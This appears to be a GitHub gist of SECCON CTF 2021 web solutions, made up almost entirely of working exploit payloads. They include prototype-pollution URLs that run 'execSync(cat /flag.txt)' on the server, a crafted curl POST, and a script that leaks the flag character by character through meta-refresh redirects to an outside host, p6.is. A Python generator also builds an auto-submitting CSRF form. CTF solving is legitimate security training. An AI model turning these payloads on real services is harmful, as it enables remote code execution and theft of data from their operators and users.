SECCON CTF 2021
http://sequence-as-a-service-1.quals.seccon.jp:3000/api/getValue?sequence=(a)%3D%3E(a(%22%2C%22%2Ca(%22set%22%2C%20a(%22self%22)%2C%20%22__proto__%22%2C%20(f)%3D%3E(1))%2Ca(%22constructor%22%2C%20%22return+process.mainModule.require('child_process').execSync('cat+/flag.txt')%2b[]%22)()))&n=1
http://sequence-as-a-service-2.quals.seccon.jp:3000/api/getValue?sequence0=(a%2Cb%2Cc)%3D%3E(a(%22%2C%22%2Ca(%22set%22%2Ca(%22set%22%2C%7B%7D%2C%22__proto__%22%2Cundefined)%2C%22x%22%2C193886)%2Ca))%0A&n0=1&sequence1=(a%2Cb%2Cc)%3D%3E(a(%22%2C%22%2Ca%2Cx(%22require(%27child_process%27).execSync(%27cat+/flag.txt%27)%2B%5B%5D%22)))&n1=1
curl https://vulnerabilities.quals.seccon.jp/api/vulnerability -X POST --data '{"Name":"b","name":"","id":14}'
<script>
window.open('/10.html');
var win;
var q = new URLSearchParams(location.search).get('q');
//query = 'R';
chars = '0123456789abcdefghijklmnopqrstuvwxyz}_';
const exp = (i) => {
if (i >= chars.length) {
return;
}
c = chars[i];
query = q + c;
url = 'http://web:3000/?search=' + query + '&msg[]=<meta name="referrer" content="unsafe-url"><meta http-equiv=refresh content="0; url=http://p6.is/?answer=' + query + '">'
win = window.open(url);
setTimeout(() => exp(i + 1), 500);
};
setTimeout(() => exp(0), 1000);
</script>
from itertools import product
li = '0123456789abcdefghijklmnopqrstuvwxyz_}'
print('<form action="http://web:3000/createNote" method="POST" name="frm">')
count = 0
for comb in product(li, repeat = 1):
print('<input name="note[]" value="SECCON{m4rqu3e_1s_my_l1fe_b'+''.join(comb)+'">')
count += 1
print(
'''<input name="note[toString]" value=".....">
<input type="submit">
</form>
<script>
frm.submit()
</script>''')
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment